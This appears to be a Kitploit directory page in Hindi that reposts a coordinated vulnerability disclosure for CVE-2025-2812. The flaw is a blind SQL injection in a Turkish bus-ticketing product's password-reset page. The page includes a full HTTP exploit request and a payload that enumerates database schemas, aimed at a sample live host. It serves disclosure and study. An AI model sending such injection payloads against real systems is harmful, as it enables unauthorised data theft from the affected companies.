Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2812 — CVE-2025-2812 SQL इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/sahici/cve-2025-2812
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 SQL इंजेक्शन

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2025-2812 — Mydata Bilişim Ltd. Şti द्वारा "Bilet Satış Otomasyonu" में SQL इंजेक्शन भेद्यता

📌 CVE-ID: CVE-2025-2812
📢 USOM घोषणा: tr-25-0099
🛡️ भेद्यता प्रकार: CWE-89 - SQL इंजेक्शन (Boolean-based Blind)
🏢 प्रभावित उत्पाद: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 नमूना लक्ष्य URL: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 भेद्यता सारांश

"Bilet Satış Otomasyonu" उत्पाद में, पासवर्ड रीसेट (SifremiUnuttum.php) पेज पर "Adınızın ilk harfi" (ilkHarf) पैरामीटर में Boolean-based Blind SQL Injection भेद्यता पाई गई है। यह भेद्यता उपयोगकर्ता नाम या पासवर्ड के बिना सिस्टम से डेटा लीक करने की अनुमति देती है।

यह भेद्यता निम्नलिखित बस कंपनियों के सिस्टम को कवर करती है:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 कंपनी

💥 PoC (Proof of Concept)

📌 HTTP अनुरोध:

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 प्रयुक्त Payload:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 तकनीकी विवरण

  • भेद्य पैरामीटर: ilkHarf
  • विधि: Boolean-based Blind SQLi
  • भेद्यता प्रकार: SQL कमांड में प्रयुक्त विशेष तत्वों का अनुचित तटस्थीकरण ('SQL Injection')

🙏 धन्यवाद

"Mydata Bilişim Ltd. Şti" द्वारा विकसित "Bilet Satış Otomasyonu" उत्पाद में हमारे द्वारा पाई गई भेद्यता के बाद, CVE-2025-2812 कोड के साथ घोषित यह खामी निर्माता और USOM के समन्वय से जारी की गई है। इस प्रक्रिया में साइबर सुरक्षा समुदाय में योगदान देकर हमें गर्व है।

भेद्यता की सूचना के बाद, Mydata Bilişim Ltd. Şti ने सभी आवश्यक प्रक्रियाओं को शीघ्रता से लागू किया, संबंधित सुरक्षा खामी को बंद किया और अपने सिस्टम में अतिरिक्त सुरक्षा उपायों को एकीकृत किया। प्रक्रिया में दिखाई गई पारदर्शिता, सहयोग और जिम्मेदारी की भावना के लिए हम उनका धन्यवाद करते हैं।

इस प्रक्रिया में साइबर सुरक्षा समुदाय में योगदान देकर हमें गर्व है।


📬 संपर्क

किसी भी प्रश्न, प्रतिक्रिया या सहयोग के लिए मुझसे संपर्क कर सकते हैं:

  • 📧 ईमेल: [email protected]
  • 📷 Instagram: @yyasar.yasin

टूल डाउनलोड करें